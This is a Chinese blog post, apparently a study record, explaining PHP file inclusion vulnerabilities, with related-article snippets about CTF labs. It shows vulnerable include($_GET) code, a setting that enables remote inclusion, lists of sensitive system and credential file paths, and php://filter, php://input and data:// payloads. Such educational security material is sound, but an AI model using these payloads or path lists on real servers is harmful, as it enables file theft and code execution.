文件包含漏洞简单总结【附练习记录】

最新推荐文章于 2024-04-25 13:59:04 发布
最新推荐文章于 2024-04-25 13:59:04 发布
阅读量312 收藏
点赞数
分类专栏: 学习记录 文章标签: 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45742511/article/details/113799369
版权

文件包含漏洞

什么是文件包含:

为了更好的使用代码的 重用性,引入了文件包含函数,可以通过文件包含函数将文件包含进来,直接使用包含文件的代码。

文件包含漏洞的成因:

为了灵活的包含文件,将被包含文件设置为变量,通过动态变量引入需要包含的文件时,用户对变量的可控而服务器端卫队变量值合理的校验或被绕过。

文件包含函数:

include() // 找不到被包含文件时产生警告,脚本继续执行

include_once() // 与include类似,但如果该文件的代码已经被包含,则不会再次包含

require() // 找不到被包含文件时产生错误,脚本停止

require_once() // 与require类似,但如果该文件的代码已经被包含,则不会再次包含

文件包含示例:

文件包含分为本地包含和远程包含。

(1)本地包含:

<?php
include($_GET["page"]);
?>

输入可控变量page:
在这里插入图片描述

在本地包含中,任何一个文件,无论是什么类型的文件,只要其文件内容符合PHP语法规范,任何扩展名都可以被PHP解析。

(2)远程包含:

远程包含功能需要在php.ini配置文件中进行修改:

allow_url_include = Off //把Off改成On

在 http://192.168.31.169/ 目录下存在test.txt文件:

<? php
  	echo "Hello World ";
?>

输入page=http://192.168.31.169/test.txt:
在这里插入图片描述

PHP文件包含的利用:

(1)读取敏感文件

常见敏感信息路径:

① Windows系统。

路径功能
C:\boot.ini查看系统版本
C:\windows\system32\inetsrv\MetaBase.xmlIIS配置文件
C:\windows\repair\sam存储Windows系统初次安装的密码
C:\Program Files\mysql\my.iniMysql配置
C:\Program Files\mysql\data\mysql\user.MYDMysql root
C:\windows\php.iniphp配置信息
C:\windows\my.iniMysql配置文件

② Linux系统。

路径功能
/etc/passwd
/usr/local/app/apache2/conf/httpd.confapache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf虚拟网站设置
/usr/local/app/php5/lib/php.iniPHP相关设置
/etc/httpd/conf/httpd.confapache配置文件
/etc/my.cofMysql的配置信息

(2)使用PHP封装协议

常见伪协议及其用法:

伪协议用法
file://?file=file://绝对路径
php://filter?file=php://filter/read=convert.base64-encode/resource=相对路径
php://input?file=php:input (POST传参<?php phpinfo()?>)
zip://?file=zip://绝对路径/xxx.zip#1.txt (1.txt为zip中的文件)
data://?file=data://text/plain,<?php phpinfo() ?> or ?file=data://text/plain;base64,编码

php://input在使用时,要保证allow_url_include=On

文件包含漏洞靶场练习

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
文件漏洞目搜集
Devil_B的博客
05-14 645
百度杯”CTF比赛 2017 二月场 没错!就是文件包含漏洞。 <?php show_source(__FILE__); if(isset($_REQUEST['path'])){ include($_REQUEST['path']); }else{ include('phpinfo.php'); } 目内容: 没错!就是文件包含漏洞。 解知识点: 文件包含:服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时
PHP文件包含漏洞复现
春日野穹
09-17 2937
引言~ 老规矩,介绍一波原理先 PHP文件包含原理: 文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 php 中引发文件包含漏洞的通常是以下四个函数: 1、include() 当使用该函数包含文件时,只有代码执行到 include() 函数时才将文件包含进来,发生错误时只给出一个...
Web漏洞-文件包含漏洞超详细全解(实例)_【web漏洞百例】
最新发布
2401_84215240的博客
04-25 1175
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…4.因为这里展示的是show.php文件,因此我们想到直接去访问show.php文件,可以看到当我们直接访问show.php时,网站返回的也是同样的内容。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
文件包含漏洞原理与实践练习
weixin_54217081的博客
12-13 877
一.多选 1.下列属于文件包含函数的是( ABCD ) A.include B.include_once C.require D.require_once 二.判断 1.文件包含漏洞在PHP中比较多,其他语言中不存在。( × ) 2.文件包含漏洞在利用时无视后缀名,任何扩展名都可以被PHP解析。( √ )
文件包含练习1
qq_61109509的博客
02-07 963
大佬文章
文件包含漏洞相关协议详解
永远是少年
12-13 2433
今天继续给大家介绍渗透测试相关知识,本文主要内容是文件包含漏洞相关协议详解。 一、文件包含常用协议 1、file协议 2、php相关协议 3、zip协议 4、data协议 5、其他协议 二、各协议利用条件
Pyrate:练习用python编写的Web App并存在一些漏洞
04-26
`Pyrate-master`压缩包包含了整个项目的源代码和相关资源,你可以通过解压文件,使用Python环境运行该项目,以便亲自测试和分析其中的漏洞。通过阅读代码,你将更深入地了解每个漏洞是如何被实现的,以及如何修复...
DVWA靶场,集成了owasp top 10漏洞
03-28
OWASP Top 10漏洞包括: 1. A1:注入攻击(Injection) - 这种攻击发生在用户输入的数据被解释为命令或查询的一部分时。例如SQL注入、命令注入等。在DVWA中,你可以通过尝试构造恶意输入来学习如何利用这种漏洞。 ...
pluck靶场镜像文件
08-25
pluck靶场镜像文件是一种专为安全研究和教育设计的虚拟环境,通常包含了一系列预配置的安全靶机系统,用户可以通过它来练习渗透测试、漏洞挖掘和网络安全技能。这个压缩包中的pluck.ova文件是一个开放虚拟化格式...
等级保护测评60期中级简答-答案
11-04
等级保护测评60期中级简答-答案 数据库测评属于安全计算环境这个安全层面。数据库测评控制点涉及到 5 个方面的内容分别为:身份鉴别、访问控制、安全审计、入侵防范以及数据备份恢复。 身份鉴别要求项: * ...
upload-labs-master.zip
06-22
【描述】描述中的 "文件上传漏洞小游戏靶场upload-labs-master/upload-labs-master/upload-labs-master/upload-labs-master" 显示这是一个针对文件上传漏洞的系列练习,通过多次嵌套的目录结构,可能旨在模拟不同...
文件类漏洞面试
m0_61990875的博客
11-08 478
文件类面试
7-2远程文件包含漏洞案例讲解和演示
山兔的博客
05-31 2155
远程文件包含漏洞测试  远程文件包含漏洞测试 远程文件包含漏洞 远程文件包含漏洞形式跟本地文件包含漏洞差不多,都是我们的开发人员在后台使用包含函数的时候,没有对它包含的目的地,进行相关的安全措施,导致前端传进来的目标地址,被直接包含进去 在本地文件包含漏洞中,它传进来的,只能是本地的文件,它只能在本地去读取相关路径下的一些文件 在远程包含漏洞中,攻击者可以通过访问外部地址来加载远程的代码 但是在PHP配置里面,我们可以通过一些特殊的配置,允许这个包含函数,去通过一些协议,比如http、ftp这样的协议,去
文件包含漏洞
syy
05-01 6199
目录 一、文件包含漏洞概述 二、文件包含漏洞类型 三、常用的防御方式 四、常用的绕过方式 一、文件包含漏洞概述 1.什么是文件包含 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 2.文件包含漏洞产生原理 文件包含函数加载的参数没有经过过滤或严格定义,可以被用户控制,包含其他恶意文件,导致了执行非预期代码。 程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量来进行动态调用,但正是
文件包含漏洞_文件包含漏洞和部分的CTF
weixin_39516865的博客
12-18 468
文件包含漏洞web6 在bp里面添加:X-Forwarded-For:127.0.0.1web11md5碰撞 上脚本: import hashlib def get_token(txt): m1 = hashlib.md5() m1.update(txt.encode("utf-8")) token = m1.hexdigest() return toke...
文件包含漏洞全面详解
热门推荐
m0_46467017的博客
08-17 6万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
文件包含漏洞靶场练习
ximo的博客
02-13 1652
目录Lfi-Labs说明LFI-1LFI-2LFI-3LFI-4LFI-5ctfshowweb 78web 79web 80-81web 82-86web 87web 88 Lfi-Labs 说明 该环境为phpstudy搭建,在网站根目录下存在phpinfo.php;以此为例。 LFI-1 源码: <?php include($_GET["page"]); ?> payload: ?page=phpinfo.php 发现并没用成功,使用 ../ 返回上一级目录 LFI-2 源码: &lt
文件包含漏洞的学习(含pikachu练习)
qq_51558360的博客
01-24 436
文件包含漏洞概述 和SQL注入等攻击方式一样,文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。 对于包含 以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程就叫做包含 漏洞成因 程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 以php,webapplication 中居多。j
文件包含漏洞(绕过姿势)
heiseweiye的博客
09-19 7107
1.1文件包含漏洞的形成 文件包含就是代码注入的典型代表,PHP的文件包含可以直接执行包含文件的代码,而且包含文件的格式是不受限制的,因此如果我们在包含文件中输入恶意代码,就会导致文件包含漏洞文件包含漏洞大多可以直接利用获取webshell。 文件包含函数主要有以下四个: include() include_once require() require_once() 他们之间的区别在于...
文件包含技术-常见文件包含
01-24
"本文主要探讨了文件包含技术,特别是针对网络安全方面常见的文件包含路径,包括Linux和Windows系统下的示例。文件包含漏洞是网络安全中的一个重要问,它允许攻击者通过恶意利用来执行任意代码或者获取敏感信息。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值